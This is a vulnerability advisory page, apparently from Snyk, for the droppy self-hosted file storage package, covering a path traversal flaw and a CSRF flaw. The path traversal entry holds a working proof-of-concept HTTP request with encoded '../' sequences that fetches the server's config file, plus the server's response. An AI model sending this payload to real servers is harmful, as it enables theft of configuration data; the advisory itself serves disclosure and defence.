droppy@1.4.9 vulnerabilities

Self-hosted file storage

Direct Vulnerabilities

Known vulnerabilities in the droppy package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free
VulnerabilityVulnerable Version
  • M
Path Traversal

droppy is a library for self-hosted file storage.

Affected versions of this package are vulnerable to Path Traversal. It is possible to traverse directories to fetch configuration files from a droopy server.

PoC

GET /!/zip/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%73%72%76%2f%64%72%6f%70%70%79%2f%63%6f%6e%66%69%67 HTTP/1.1
Host: 192.168.0.11:8989
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: s=XtlnyU3If2YoVi8jiExHS++NwzrMpQMbmS0l/usCPJcH2J8S
Upgrade-Insecure-Requests: 1




HTTP/1.1 200 OK
Content-Type: text/plain
Content-Disposition: attachment; filename="config.zip"
Cache-Control: private, max-age=0
ETag: "4a-akoxq55ZKs8DpqVaiOcP6h8oCoI"
Date: Sun, 25 Oct 2020 18:27:10 GMT
Connection: close
Content-Length: 847


Backend Request: /!/zip/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../srv/droppy/config

How to fix Path Traversal?

There is no fixed version for droppy.

*
  • M
Cross-site Request Forgery (CSRF)

droopy prior to 3.5.0 lacks cross-domain websocket requests verification. This allows attackers to send malicious requests while inheriting the identity and privileges of the currently logged in user.

How to fix Cross-site Request Forgery (CSRF)?

Upgrade to version 3.5.0 or greater.

<3.5.0